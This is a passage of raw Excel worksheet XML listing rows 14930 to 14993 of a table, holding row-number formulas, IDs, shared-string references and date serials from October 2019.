        <v>9975</v>
      </c>
      <c r="G14930" t="s">
        <v>25421</v>
      </c>
    </row>
    <row r="14931" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14931">
        <f t="shared" si="233"/>
        <v>14930</v>
      </c>
      <c r="B14931">
        <v>4930</v>
      </c>
      <c r="C14931" t="s">
        <v>19637</v>
      </c>
      <c r="D14931" s="1">
        <v>43743</v>
      </c>
      <c r="F14931" t="s">
        <v>10526</v>
      </c>
      <c r="G14931" t="s">
        <v>24835</v>
      </c>
    </row>
    <row r="14932" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14932">
        <f t="shared" si="233"/>
        <v>14931</v>
      </c>
      <c r="B14932">
        <v>4931</v>
      </c>
      <c r="C14932" t="s">
        <v>19637</v>
      </c>
      <c r="D14932" s="1">
        <v>43749</v>
      </c>
      <c r="E14932" t="s">
        <v>25422</v>
      </c>
      <c r="F14932" t="s">
        <v>10526</v>
      </c>
      <c r="G14932" t="s">
        <v>25423</v>
      </c>
    </row>
    <row r="14933" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14933">
        <f t="shared" si="233"/>
        <v>14932</v>
      </c>
      <c r="B14933">
        <v>4932</v>
      </c>
      <c r="C14933" t="s">
        <v>19637</v>
      </c>
      <c r="D14933" s="1">
        <v>43750</v>
      </c>
      <c r="F14933" t="s">
        <v>10526</v>
      </c>
      <c r="G14933" t="s">
        <v>25424</v>
      </c>
    </row>
    <row r="14934" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14934">
        <f t="shared" si="233"/>
        <v>14933</v>
      </c>
      <c r="B14934">
        <v>4933</v>
      </c>
      <c r="C14934" t="s">
        <v>19637</v>
      </c>
      <c r="D14934" s="1">
        <v>43749</v>
      </c>
      <c r="F14934" t="s">
        <v>10526</v>
      </c>
      <c r="G14934" t="s">
        <v>25425</v>
      </c>
    </row>
    <row r="14935" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14935">
        <f t="shared" si="233"/>
        <v>14934</v>
      </c>
      <c r="B14935">
        <v>4934</v>
      </c>
      <c r="C14935" t="s">
        <v>19637</v>
      </c>
      <c r="D14935" s="1">
        <v>43748</v>
      </c>
      <c r="F14935" t="s">
        <v>10526</v>
      </c>
      <c r="G14935" t="s">
        <v>25426</v>
      </c>
    </row>
    <row r="14936" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14936">
        <f t="shared" si="233"/>
        <v>14935</v>
      </c>
      <c r="B14936">
        <v>4935</v>
      </c>
      <c r="C14936" t="s">
        <v>19637</v>
      </c>
      <c r="D14936" s="1">
        <v>43748</v>
      </c>
      <c r="E14936" t="s">
        <v>23078</v>
      </c>
      <c r="F14936" t="s">
        <v>10021</v>
      </c>
      <c r="G14936" t="s">
        <v>25427</v>
      </c>
    </row>
    <row r="14937" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14937">
        <f t="shared" si="233"/>
        <v>14936</v>
      </c>
      <c r="B14937">
        <v>4936</v>
      </c>
      <c r="C14937" t="s">
        <v>19637</v>
      </c>
      <c r="D14937" s="1">
        <v>43745</v>
      </c>
      <c r="F14937" t="s">
        <v>10526</v>
      </c>
      <c r="G14937" t="s">
        <v>25428</v>
      </c>
    </row>
    <row r="14938" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14938">
        <f t="shared" si="233"/>
        <v>14937</v>
      </c>
      <c r="B14938">
        <v>4937</v>
      </c>
      <c r="C14938" t="s">
        <v>19637</v>
      </c>
      <c r="D14938" s="1">
        <v>43755</v>
      </c>
      <c r="E14938" t="s">
        <v>19640</v>
      </c>
      <c r="F14938" t="s">
        <v>9975</v>
      </c>
      <c r="G14938" t="s">
        <v>25429</v>
      </c>
    </row>
    <row r="14939" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14939">
        <f t="shared" si="233"/>
        <v>14938</v>
      </c>
      <c r="B14939">
        <v>4938</v>
      </c>
      <c r="C14939" t="s">
        <v>19637</v>
      </c>
      <c r="D14939" s="1">
        <v>43748</v>
      </c>
      <c r="E14939" t="s">
        <v>25430</v>
      </c>
      <c r="F14939" t="s">
        <v>10526</v>
      </c>
      <c r="G14939" t="s">
        <v>25431</v>
      </c>
    </row>
    <row r="14940" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14940">
        <f t="shared" si="233"/>
        <v>14939</v>
      </c>
      <c r="B14940">
        <v>4939</v>
      </c>
      <c r="C14940" t="s">
        <v>19637</v>
      </c>
      <c r="D14940" s="1">
        <v>43748</v>
      </c>
      <c r="F14940" t="s">
        <v>10526</v>
      </c>
      <c r="G14940" t="s">
        <v>25432</v>
      </c>
    </row>
    <row r="14941" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14941">
        <f t="shared" si="233"/>
        <v>14940</v>
      </c>
      <c r="B14941">
        <v>4940</v>
      </c>
      <c r="C14941" t="s">
        <v>19637</v>
      </c>
      <c r="D14941" s="1">
        <v>43749</v>
      </c>
      <c r="E14941" t="s">
        <v>20113</v>
      </c>
      <c r="F14941" t="s">
        <v>9978</v>
      </c>
      <c r="G14941" t="s">
        <v>25433</v>
      </c>
    </row>
    <row r="14942" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14942">
        <f t="shared" si="233"/>
        <v>14941</v>
      </c>
      <c r="B14942">
        <v>4941</v>
      </c>
      <c r="C14942" t="s">
        <v>19637</v>
      </c>
      <c r="D14942" s="1">
        <v>43750</v>
      </c>
      <c r="E14942" t="s">
        <v>21369</v>
      </c>
      <c r="F14942" t="s">
        <v>9975</v>
      </c>
      <c r="G14942" t="s">
        <v>25434</v>
      </c>
    </row>
    <row r="14943" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14943">
        <f t="shared" si="233"/>
        <v>14942</v>
      </c>
      <c r="B14943">
        <v>4942</v>
      </c>
      <c r="C14943" t="s">
        <v>19637</v>
      </c>
      <c r="D14943" s="1">
        <v>43746</v>
      </c>
      <c r="E14943" t="s">
        <v>19640</v>
      </c>
      <c r="F14943" t="s">
        <v>9975</v>
      </c>
      <c r="G14943" t="s">
        <v>25435</v>
      </c>
    </row>
    <row r="14944" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14944">
        <f t="shared" si="233"/>
        <v>14943</v>
      </c>
      <c r="B14944">
        <v>4943</v>
      </c>
      <c r="C14944" t="s">
        <v>19637</v>
      </c>
      <c r="D14944" s="1">
        <v>43742</v>
      </c>
      <c r="E14944" t="s">
        <v>19794</v>
      </c>
      <c r="F14944" t="s">
        <v>10526</v>
      </c>
      <c r="G14944" t="s">
        <v>25436</v>
      </c>
    </row>
    <row r="14945" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14945">
        <f t="shared" si="233"/>
        <v>14944</v>
      </c>
      <c r="B14945">
        <v>4944</v>
      </c>
      <c r="C14945" t="s">
        <v>19637</v>
      </c>
      <c r="D14945" s="1">
        <v>43754</v>
      </c>
      <c r="F14945" t="s">
        <v>10021</v>
      </c>
      <c r="G14945" t="s">
        <v>25437</v>
      </c>
    </row>
    <row r="14946" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14946">
        <f t="shared" si="233"/>
        <v>14945</v>
      </c>
      <c r="B14946">
        <v>4945</v>
      </c>
      <c r="C14946" t="s">
        <v>19637</v>
      </c>
      <c r="D14946" s="1">
        <v>43751</v>
      </c>
      <c r="E14946" t="s">
        <v>19648</v>
      </c>
      <c r="F14946" t="s">
        <v>10021</v>
      </c>
      <c r="G14946" t="s">
        <v>25438</v>
      </c>
    </row>
    <row r="14947" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14947">
        <f t="shared" si="233"/>
        <v>14946</v>
      </c>
      <c r="B14947">
        <v>4946</v>
      </c>
      <c r="C14947" t="s">
        <v>19637</v>
      </c>
      <c r="D14947" s="1">
        <v>43745</v>
      </c>
      <c r="E14947" t="s">
        <v>19640</v>
      </c>
      <c r="F14947" t="s">
        <v>9975</v>
      </c>
      <c r="G14947" t="s">
        <v>25439</v>
      </c>
    </row>
    <row r="14948" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14948">
        <f t="shared" si="233"/>
        <v>14947</v>
      </c>
      <c r="B14948">
        <v>4947</v>
      </c>
      <c r="C14948" t="s">
        <v>19637</v>
      </c>
      <c r="D14948" s="1">
        <v>43756</v>
      </c>
      <c r="E14948" t="s">
        <v>23813</v>
      </c>
      <c r="F14948" t="s">
        <v>10526</v>
      </c>
      <c r="G14948" t="s">
        <v>25440</v>
      </c>
    </row>
    <row r="14949" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14949">
        <f t="shared" si="233"/>
        <v>14948</v>
      </c>
      <c r="B14949">
        <v>4948</v>
      </c>
      <c r="C14949" t="s">
        <v>19637</v>
      </c>
      <c r="D14949" s="1">
        <v>43757</v>
      </c>
      <c r="F14949" t="s">
        <v>9975</v>
      </c>
      <c r="G14949" t="s">
        <v>25441</v>
      </c>
    </row>
    <row r="14950" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14950">
        <f t="shared" si="233"/>
        <v>14949</v>
      </c>
      <c r="B14950">
        <v>4949</v>
      </c>
      <c r="C14950" t="s">
        <v>19637</v>
      </c>
      <c r="D14950" s="1">
        <v>43744</v>
      </c>
      <c r="F14950" t="s">
        <v>10526</v>
      </c>
      <c r="G14950" t="s">
        <v>25442</v>
      </c>
    </row>
    <row r="14951" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14951">
        <f t="shared" si="233"/>
        <v>14950</v>
      </c>
      <c r="B14951">
        <v>4950</v>
      </c>
      <c r="C14951" t="s">
        <v>19637</v>
      </c>
      <c r="D14951" s="1">
        <v>43746</v>
      </c>
      <c r="E14951" t="s">
        <v>20751</v>
      </c>
      <c r="F14951" t="s">
        <v>10021</v>
      </c>
      <c r="G14951" t="s">
        <v>25443</v>
      </c>
    </row>
    <row r="14952" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14952">
        <f t="shared" si="233"/>
        <v>14951</v>
      </c>
      <c r="B14952">
        <v>4951</v>
      </c>
      <c r="C14952" t="s">
        <v>19637</v>
      </c>
      <c r="D14952" s="1">
        <v>43742</v>
      </c>
      <c r="E14952" t="s">
        <v>19917</v>
      </c>
      <c r="F14952" t="s">
        <v>9975</v>
      </c>
      <c r="G14952" t="s">
        <v>25444</v>
      </c>
    </row>
    <row r="14953" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14953">
        <f t="shared" si="233"/>
        <v>14952</v>
      </c>
      <c r="B14953">
        <v>4952</v>
      </c>
      <c r="C14953" t="s">
        <v>19637</v>
      </c>
      <c r="D14953" s="1">
        <v>43753</v>
      </c>
      <c r="E14953" t="s">
        <v>19690</v>
      </c>
      <c r="F14953" t="s">
        <v>9978</v>
      </c>
      <c r="G14953" t="s">
        <v>25445</v>
      </c>
    </row>
    <row r="14954" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14954">
        <f t="shared" si="233"/>
        <v>14953</v>
      </c>
      <c r="B14954">
        <v>4953</v>
      </c>
      <c r="C14954" t="s">
        <v>19637</v>
      </c>
      <c r="D14954" s="1">
        <v>43748</v>
      </c>
      <c r="E14954" t="s">
        <v>20488</v>
      </c>
      <c r="F14954" t="s">
        <v>10526</v>
      </c>
      <c r="G14954" t="s">
        <v>25446</v>
      </c>
    </row>
    <row r="14955" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14955">
        <f t="shared" si="233"/>
        <v>14954</v>
      </c>
      <c r="B14955">
        <v>4954</v>
      </c>
      <c r="C14955" t="s">
        <v>19637</v>
      </c>
      <c r="D14955" s="1">
        <v>43755</v>
      </c>
      <c r="E14955" t="s">
        <v>20175</v>
      </c>
      <c r="F14955" t="s">
        <v>10526</v>
      </c>
      <c r="G14955" t="s">
        <v>25447</v>
      </c>
    </row>
    <row r="14956" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14956">
        <f t="shared" si="233"/>
        <v>14955</v>
      </c>
      <c r="B14956">
        <v>4955</v>
      </c>
      <c r="C14956" t="s">
        <v>19637</v>
      </c>
      <c r="D14956" s="1">
        <v>43746</v>
      </c>
      <c r="E14956" t="s">
        <v>25448</v>
      </c>
      <c r="F14956" t="s">
        <v>10526</v>
      </c>
      <c r="G14956" t="s">
        <v>25449</v>
      </c>
    </row>
    <row r="14957" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14957">
        <f t="shared" si="233"/>
        <v>14956</v>
      </c>
      <c r="B14957">
        <v>4956</v>
      </c>
      <c r="C14957" t="s">
        <v>19637</v>
      </c>
      <c r="D14957" s="1">
        <v>43751</v>
      </c>
      <c r="E14957" t="s">
        <v>19717</v>
      </c>
      <c r="F14957" t="s">
        <v>10526</v>
      </c>
      <c r="G14957" t="s">
        <v>25450</v>
      </c>
    </row>
    <row r="14958" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14958">
        <f t="shared" si="233"/>
        <v>14957</v>
      </c>
      <c r="B14958">
        <v>4957</v>
      </c>
      <c r="C14958" t="s">
        <v>19637</v>
      </c>
      <c r="D14958" s="1">
        <v>43744</v>
      </c>
      <c r="F14958" t="s">
        <v>10526</v>
      </c>
      <c r="G14958" t="s">
        <v>25451</v>
      </c>
    </row>
    <row r="14959" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14959">
        <f t="shared" si="233"/>
        <v>14958</v>
      </c>
      <c r="B14959">
        <v>4958</v>
      </c>
      <c r="C14959" t="s">
        <v>19637</v>
      </c>
      <c r="D14959" s="1">
        <v>43740</v>
      </c>
      <c r="E14959" t="s">
        <v>21566</v>
      </c>
      <c r="F14959" t="s">
        <v>10526</v>
      </c>
      <c r="G14959" t="s">
        <v>25452</v>
      </c>
    </row>
    <row r="14960" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14960">
        <f t="shared" si="233"/>
        <v>14959</v>
      </c>
      <c r="B14960">
        <v>4959</v>
      </c>
      <c r="C14960" t="s">
        <v>19637</v>
      </c>
      <c r="D14960" s="1">
        <v>43752</v>
      </c>
      <c r="E14960" t="s">
        <v>19640</v>
      </c>
      <c r="F14960" t="s">
        <v>9975</v>
      </c>
      <c r="G14960" t="s">
        <v>25453</v>
      </c>
    </row>
    <row r="14961" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14961">
        <f t="shared" si="233"/>
        <v>14960</v>
      </c>
      <c r="B14961">
        <v>4960</v>
      </c>
      <c r="C14961" t="s">
        <v>19637</v>
      </c>
      <c r="D14961" s="1">
        <v>43752</v>
      </c>
      <c r="E14961" t="s">
        <v>19896</v>
      </c>
      <c r="F14961" t="s">
        <v>10021</v>
      </c>
      <c r="G14961" t="s">
        <v>25454</v>
      </c>
    </row>
    <row r="14962" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14962">
        <f t="shared" si="233"/>
        <v>14961</v>
      </c>
      <c r="B14962">
        <v>4961</v>
      </c>
      <c r="C14962" t="s">
        <v>19637</v>
      </c>
      <c r="D14962" s="1">
        <v>43754</v>
      </c>
      <c r="E14962" t="s">
        <v>19640</v>
      </c>
      <c r="F14962" t="s">
        <v>9975</v>
      </c>
      <c r="G14962" t="s">
        <v>25455</v>
      </c>
    </row>
    <row r="14963" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14963">
        <f t="shared" si="233"/>
        <v>14962</v>
      </c>
      <c r="B14963">
        <v>4962</v>
      </c>
      <c r="C14963" t="s">
        <v>19637</v>
      </c>
      <c r="D14963" s="1">
        <v>43749</v>
      </c>
      <c r="E14963" t="s">
        <v>25456</v>
      </c>
      <c r="F14963" t="s">
        <v>10526</v>
      </c>
      <c r="G14963" t="s">
        <v>25457</v>
      </c>
    </row>
    <row r="14964" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14964">
        <f t="shared" si="233"/>
        <v>14963</v>
      </c>
      <c r="B14964">
        <v>4963</v>
      </c>
      <c r="C14964" t="s">
        <v>19637</v>
      </c>
      <c r="D14964" s="1">
        <v>43751</v>
      </c>
      <c r="E14964" t="s">
        <v>19663</v>
      </c>
      <c r="F14964" t="s">
        <v>9975</v>
      </c>
      <c r="G14964" t="s">
        <v>25458</v>
      </c>
    </row>
    <row r="14965" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14965">
        <f t="shared" si="233"/>
        <v>14964</v>
      </c>
      <c r="B14965">
        <v>4964</v>
      </c>
      <c r="C14965" t="s">
        <v>19637</v>
      </c>
      <c r="D14965" s="1">
        <v>43749</v>
      </c>
      <c r="E14965" t="s">
        <v>20488</v>
      </c>
      <c r="F14965" t="s">
        <v>10526</v>
      </c>
      <c r="G14965" t="s">
        <v>25459</v>
      </c>
    </row>
    <row r="14966" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14966">
        <f t="shared" si="233"/>
        <v>14965</v>
      </c>
      <c r="B14966">
        <v>4965</v>
      </c>
      <c r="C14966" t="s">
        <v>19637</v>
      </c>
      <c r="D14966" s="1">
        <v>43747</v>
      </c>
      <c r="E14966" t="s">
        <v>25460</v>
      </c>
      <c r="F14966" t="s">
        <v>9978</v>
      </c>
      <c r="G14966" t="s">
        <v>25461</v>
      </c>
    </row>
    <row r="14967" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14967">
        <f t="shared" si="233"/>
        <v>14966</v>
      </c>
      <c r="B14967">
        <v>4966</v>
      </c>
      <c r="C14967" t="s">
        <v>19637</v>
      </c>
      <c r="D14967" s="1">
        <v>43751</v>
      </c>
      <c r="E14967" t="s">
        <v>19725</v>
      </c>
      <c r="F14967" t="s">
        <v>9978</v>
      </c>
      <c r="G14967" t="s">
        <v>25462</v>
      </c>
    </row>
    <row r="14968" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14968">
        <f t="shared" si="233"/>
        <v>14967</v>
      </c>
      <c r="B14968">
        <v>4967</v>
      </c>
      <c r="C14968" t="s">
        <v>19637</v>
      </c>
      <c r="D14968" s="1">
        <v>43748</v>
      </c>
      <c r="E14968" t="s">
        <v>25463</v>
      </c>
      <c r="F14968" t="s">
        <v>10526</v>
      </c>
      <c r="G14968" t="s">
        <v>25464</v>
      </c>
    </row>
    <row r="14969" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14969">
        <f t="shared" si="233"/>
        <v>14968</v>
      </c>
      <c r="B14969">
        <v>4968</v>
      </c>
      <c r="C14969" t="s">
        <v>19637</v>
      </c>
      <c r="D14969" s="1">
        <v>43745</v>
      </c>
      <c r="E14969" t="s">
        <v>19653</v>
      </c>
      <c r="F14969" t="s">
        <v>9975</v>
      </c>
      <c r="G14969" t="s">
        <v>25465</v>
      </c>
    </row>
    <row r="14970" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14970">
        <f t="shared" si="233"/>
        <v>14969</v>
      </c>
      <c r="B14970">
        <v>4969</v>
      </c>
      <c r="C14970" t="s">
        <v>19637</v>
      </c>
      <c r="D14970" s="1">
        <v>43756</v>
      </c>
      <c r="E14970" t="s">
        <v>19834</v>
      </c>
      <c r="F14970" t="s">
        <v>10526</v>
      </c>
      <c r="G14970" t="s">
        <v>25466</v>
      </c>
    </row>
    <row r="14971" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14971">
        <f t="shared" si="233"/>
        <v>14970</v>
      </c>
      <c r="B14971">
        <v>4970</v>
      </c>
      <c r="C14971" t="s">
        <v>19637</v>
      </c>
      <c r="D14971" s="1">
        <v>43740</v>
      </c>
      <c r="E14971" t="s">
        <v>19680</v>
      </c>
      <c r="F14971" t="s">
        <v>10021</v>
      </c>
      <c r="G14971" t="s">
        <v>25467</v>
      </c>
    </row>
    <row r="14972" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14972">
        <f t="shared" si="233"/>
        <v>14971</v>
      </c>
      <c r="B14972">
        <v>4971</v>
      </c>
      <c r="C14972" t="s">
        <v>19637</v>
      </c>
      <c r="D14972" s="1">
        <v>43754</v>
      </c>
      <c r="E14972" t="s">
        <v>22222</v>
      </c>
      <c r="F14972" t="s">
        <v>9978</v>
      </c>
      <c r="G14972" t="s">
        <v>25468</v>
      </c>
    </row>
    <row r="14973" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14973">
        <f t="shared" si="233"/>
        <v>14972</v>
      </c>
      <c r="B14973">
        <v>4972</v>
      </c>
      <c r="C14973" t="s">
        <v>19637</v>
      </c>
      <c r="D14973" s="1">
        <v>43746</v>
      </c>
      <c r="F14973" t="s">
        <v>9978</v>
      </c>
      <c r="G14973" t="s">
        <v>25469</v>
      </c>
    </row>
    <row r="14974" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14974">
        <f t="shared" si="233"/>
        <v>14973</v>
      </c>
      <c r="B14974">
        <v>4973</v>
      </c>
      <c r="C14974" t="s">
        <v>19637</v>
      </c>
      <c r="D14974" s="1">
        <v>43749</v>
      </c>
      <c r="E14974" t="s">
        <v>20813</v>
      </c>
      <c r="F14974" t="s">
        <v>10526</v>
      </c>
      <c r="G14974" t="s">
        <v>25470</v>
      </c>
    </row>
    <row r="14975" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14975">
        <f t="shared" si="233"/>
        <v>14974</v>
      </c>
      <c r="B14975">
        <v>4974</v>
      </c>
      <c r="C14975" t="s">
        <v>19637</v>
      </c>
      <c r="D14975" s="1">
        <v>43751</v>
      </c>
      <c r="E14975" t="s">
        <v>19640</v>
      </c>
      <c r="F14975" t="s">
        <v>10021</v>
      </c>
      <c r="G14975" t="s">
        <v>25471</v>
      </c>
    </row>
    <row r="14976" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14976">
        <f t="shared" si="233"/>
        <v>14975</v>
      </c>
      <c r="B14976">
        <v>4975</v>
      </c>
      <c r="C14976" t="s">
        <v>19637</v>
      </c>
      <c r="D14976" s="1">
        <v>43752</v>
      </c>
      <c r="E14976" t="s">
        <v>24028</v>
      </c>
      <c r="F14976" t="s">
        <v>9978</v>
      </c>
      <c r="G14976" t="s">
        <v>25472</v>
      </c>
    </row>
    <row r="14977" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14977">
        <f t="shared" si="233"/>
        <v>14976</v>
      </c>
      <c r="B14977">
        <v>4976</v>
      </c>
      <c r="C14977" t="s">
        <v>19637</v>
      </c>
      <c r="D14977" s="1">
        <v>43751</v>
      </c>
      <c r="E14977" t="s">
        <v>21985</v>
      </c>
      <c r="F14977" t="s">
        <v>10021</v>
      </c>
      <c r="G14977" t="s">
        <v>25473</v>
      </c>
    </row>
    <row r="14978" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14978">
        <f t="shared" si="233"/>
        <v>14977</v>
      </c>
      <c r="B14978">
        <v>4977</v>
      </c>
      <c r="C14978" t="s">
        <v>19637</v>
      </c>
      <c r="D14978" s="1">
        <v>43740</v>
      </c>
      <c r="E14978" t="s">
        <v>19640</v>
      </c>
      <c r="F14978" t="s">
        <v>10021</v>
      </c>
      <c r="G14978" t="s">
        <v>25474</v>
      </c>
    </row>
    <row r="14979" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14979">
        <f t="shared" ref="A14979:A15042" si="234">+ROW(A14978)</f>
        <v>14978</v>
      </c>
      <c r="B14979">
        <v>4978</v>
      </c>
      <c r="C14979" t="s">
        <v>19637</v>
      </c>
      <c r="D14979" s="1">
        <v>43751</v>
      </c>
      <c r="E14979" t="s">
        <v>23590</v>
      </c>
      <c r="F14979" t="s">
        <v>9975</v>
      </c>
      <c r="G14979" t="s">
        <v>25475</v>
      </c>
    </row>
    <row r="14980" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14980">
        <f t="shared" si="234"/>
        <v>14979</v>
      </c>
      <c r="B14980">
        <v>4979</v>
      </c>
      <c r="C14980" t="s">
        <v>19637</v>
      </c>
      <c r="D14980" s="1">
        <v>43749</v>
      </c>
      <c r="F14980" t="s">
        <v>10526</v>
      </c>
      <c r="G14980" t="s">
        <v>25476</v>
      </c>
    </row>
    <row r="14981" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14981">
        <f t="shared" si="234"/>
        <v>14980</v>
      </c>
      <c r="B14981">
        <v>4980</v>
      </c>
      <c r="C14981" t="s">
        <v>19637</v>
      </c>
      <c r="D14981" s="1">
        <v>43747</v>
      </c>
      <c r="F14981" t="s">
        <v>10526</v>
      </c>
      <c r="G14981" t="s">
        <v>25477</v>
      </c>
    </row>
    <row r="14982" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14982">
        <f t="shared" si="234"/>
        <v>14981</v>
      </c>
      <c r="B14982">
        <v>4981</v>
      </c>
      <c r="C14982" t="s">
        <v>19637</v>
      </c>
      <c r="D14982" s="1">
        <v>43755</v>
      </c>
      <c r="F14982" t="s">
        <v>10526</v>
      </c>
      <c r="G14982" t="s">
        <v>25478</v>
      </c>
    </row>
    <row r="14983" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14983">
        <f t="shared" si="234"/>
        <v>14982</v>
      </c>
      <c r="B14983">
        <v>4982</v>
      </c>
      <c r="C14983" t="s">
        <v>19637</v>
      </c>
      <c r="D14983" s="1">
        <v>43739</v>
      </c>
      <c r="E14983" t="s">
        <v>23436</v>
      </c>
      <c r="F14983" t="s">
        <v>9978</v>
      </c>
      <c r="G14983" t="s">
        <v>25479</v>
      </c>
    </row>
    <row r="14984" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14984">
        <f t="shared" si="234"/>
        <v>14983</v>
      </c>
      <c r="B14984">
        <v>4983</v>
      </c>
      <c r="C14984" t="s">
        <v>19637</v>
      </c>
      <c r="D14984" s="1">
        <v>43741</v>
      </c>
      <c r="F14984" t="s">
        <v>10526</v>
      </c>
      <c r="G14984" t="s">
        <v>25480</v>
      </c>
    </row>
    <row r="14985" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14985">
        <f t="shared" si="234"/>
        <v>14984</v>
      </c>
      <c r="B14985">
        <v>4984</v>
      </c>
      <c r="C14985" t="s">
        <v>19637</v>
      </c>
      <c r="D14985" s="1">
        <v>43740</v>
      </c>
      <c r="E14985" t="s">
        <v>22557</v>
      </c>
      <c r="F14985" t="s">
        <v>10526</v>
      </c>
      <c r="G14985" t="s">
        <v>25481</v>
      </c>
    </row>
    <row r="14986" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14986">
        <f t="shared" si="234"/>
        <v>14985</v>
      </c>
      <c r="B14986">
        <v>4985</v>
      </c>
      <c r="C14986" t="s">
        <v>19637</v>
      </c>
      <c r="D14986" s="1">
        <v>43749</v>
      </c>
      <c r="F14986" t="s">
        <v>10526</v>
      </c>
      <c r="G14986" t="s">
        <v>25482</v>
      </c>
    </row>
    <row r="14987" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14987">
        <f t="shared" si="234"/>
        <v>14986</v>
      </c>
      <c r="B14987">
        <v>4986</v>
      </c>
      <c r="C14987" t="s">
        <v>19637</v>
      </c>
      <c r="D14987" s="1">
        <v>43753</v>
      </c>
      <c r="E14987" t="s">
        <v>19640</v>
      </c>
      <c r="F14987" t="s">
        <v>9975</v>
      </c>
      <c r="G14987" t="s">
        <v>24967</v>
      </c>
    </row>
    <row r="14988" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14988">
        <f t="shared" si="234"/>
        <v>14987</v>
      </c>
      <c r="B14988">
        <v>4987</v>
      </c>
      <c r="C14988" t="s">
        <v>19637</v>
      </c>
      <c r="D14988" s="1">
        <v>43752</v>
      </c>
      <c r="E14988" t="s">
        <v>24195</v>
      </c>
      <c r="F14988" t="s">
        <v>10526</v>
      </c>
      <c r="G14988" t="s">
        <v>25483</v>
      </c>
    </row>
    <row r="14989" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14989">
        <f t="shared" si="234"/>
        <v>14988</v>
      </c>
      <c r="B14989">
        <v>4988</v>
      </c>
      <c r="C14989" t="s">
        <v>19637</v>
      </c>
      <c r="D14989" s="1">
        <v>43745</v>
      </c>
      <c r="E14989" t="s">
        <v>19879</v>
      </c>
      <c r="F14989" t="s">
        <v>10021</v>
      </c>
      <c r="G14989" t="s">
        <v>25484</v>
      </c>
    </row>
    <row r="14990" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14990">
        <f t="shared" si="234"/>
        <v>14989</v>
      </c>
      <c r="B14990">
        <v>4989</v>
      </c>
      <c r="C14990" t="s">
        <v>19637</v>
      </c>
      <c r="D14990" s="1">
        <v>43740</v>
      </c>
      <c r="E14990" t="s">
        <v>20331</v>
      </c>
      <c r="F14990" t="s">
        <v>10526</v>
      </c>
      <c r="G14990" t="s">
        <v>25485</v>
      </c>
    </row>
    <row r="14991" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14991">
        <f t="shared" si="234"/>
        <v>14990</v>
      </c>
      <c r="B14991">
        <v>4990</v>
      </c>
      <c r="C14991" t="s">
        <v>19637</v>
      </c>
      <c r="D14991" s="1">
        <v>43750</v>
      </c>
      <c r="E14991" t="s">
        <v>19640</v>
      </c>
      <c r="F14991" t="s">
        <v>10021</v>
      </c>
      <c r="G14991" t="s">
        <v>25486</v>
      </c>
    </row>
    <row r="14992" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14992">
        <f t="shared" si="234"/>
        <v>14991</v>
      </c>
      <c r="B14992">
        <v>4991</v>
      </c>
      <c r="C14992" t="s">
        <v>19637</v>
      </c>
      <c r="D14992" s="1">
        <v>43743</v>
      </c>
      <c r="E14992" t="s">
        <v>19648</v>
      </c>
      <c r="F14992" t="s">
        <v>10021</v>
      </c>
      <c r="G14992" t="s">
        <v>25487</v>
      </c>
    </row>
    <row r="14993" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14993">
        <f t="shared" si="234"/>
        <v>14992</v>
      </c>
      <c r="B14993">
        <v>4992</v>
      </c>
      <c r="C14993" t="s">
        <v>19637</v>
      </c>
      <c r="D14993" s="1">
